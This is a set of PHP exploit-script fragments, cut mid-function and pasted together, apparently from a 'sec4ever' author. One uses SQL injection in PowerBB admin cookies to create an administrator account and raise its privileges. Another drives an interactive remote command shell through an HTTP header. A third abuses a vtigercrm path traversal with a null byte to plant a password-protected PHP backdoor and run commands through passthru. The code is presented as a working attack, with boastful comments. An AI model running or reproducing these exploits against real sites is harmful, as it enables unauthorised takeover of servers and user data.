$string = " " . $string; $ini = strpos($string, $start); if ($ini == 0) { return ""; } $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } $vic = str_replace('http://', '', trim(fgets(STDIN))); if ($vic == '') { exit; } $log = fopen('faris.txt', 'w+'); $ran = rand(10000, 20000); echo "| Adding New User\n"; $add = get($vic . '/admin.php?page=member&add=1&start=1', "username=f4ris_{$ran}&password=sec4ever1337s&email=n0p1337_{$ran}@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82", "PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%"); $myid = kastr($add, 'main=1&id=', '">'); if ($myid == '') { exit("| Exploitation Failed\n - Magic_Quotes Maybe on or wrong path\n+ Exit"); } echo "| User Data :\n + UserName : f4ris_{$ran}\n + Password : sec4ever1337s\n + User ID : {$myid}\n"; echo "| Updating User privileges\n"; $update = get($vic . "admin.php?page=member&edit=1&start=1&id={$myid}", "username=f4ris_{$ran}&new_username=f4ris_{$ran}&new_password=sec4ever1337s&email=n0p1337_{$ran}@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82", "PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%"); echo "+ Exploitatin Done ;)\n"; exit; ?>
} echo "| sec4ever shell online ;)\n"; /* if passthru() is enabled , then get small command executer using Egix fsock method to send and retrieve data */ function http_send($host, $packet) { $sock = fsockopen($host, 80); fputs($sock, $packet); return stream_get_contents($sock); } $packet = "GET /{$path}/pages.php?pageid={$myid} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) { print "\ni-Hmx@" . $_SESSION['host'] . "# "; if (($fa = trim(fgets(STDIN))) == "exit") { exit("\n+ Exiting"); } $response = http_send($host, sprintf($packet, base64_encode($fa))); $final = kastr($response, "faris>>>", "<<<faris"); echo $final; } /* woooooow , that really f****d my mind But it was funny :D Greets to all sec4ever members C u Guys in another Bomb ;) */
return substr($string, $ini, $len); } $me = faget($target . "/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00", ""); echo "| Testing total payload\n"; $total = faget($target . "/vtigercrm/farsawy.php", "pwd=1337"); if (!eregi("Faris on the mic :D", $total)) { die("[+] Exploitation Failed\n"); } echo "| Sending CMD test package\n"; $cmd = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw=="); if (!eregi("farsawy", $cmd)) { echo " + Cmd couldn't executed but we can evaluate php code\n + use :\r\n{$target}//vtigercrm/fa.php\n Post : fa=base64code\n"; } echo "| sec4ever shell online ;)\n\n"; $host = str_replace('https://', '', $target); while (1) { echo "i-Hmx@{$host}# "; $c = trim(fgets(STDIN)); if ($c == 'exit') { die("[+] Terminating\n"); } $payload = base64_encode("passthru('{$c}');"); $f**k = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa={$payload}"); $done = kastr($f**k, "-----------------", "-----------------"); echo "{$done}\n"; } /* I dont even remember when i exploited this shit! maybe on 2013?! whatever , Hope its not sold as 0day in the near future xDD */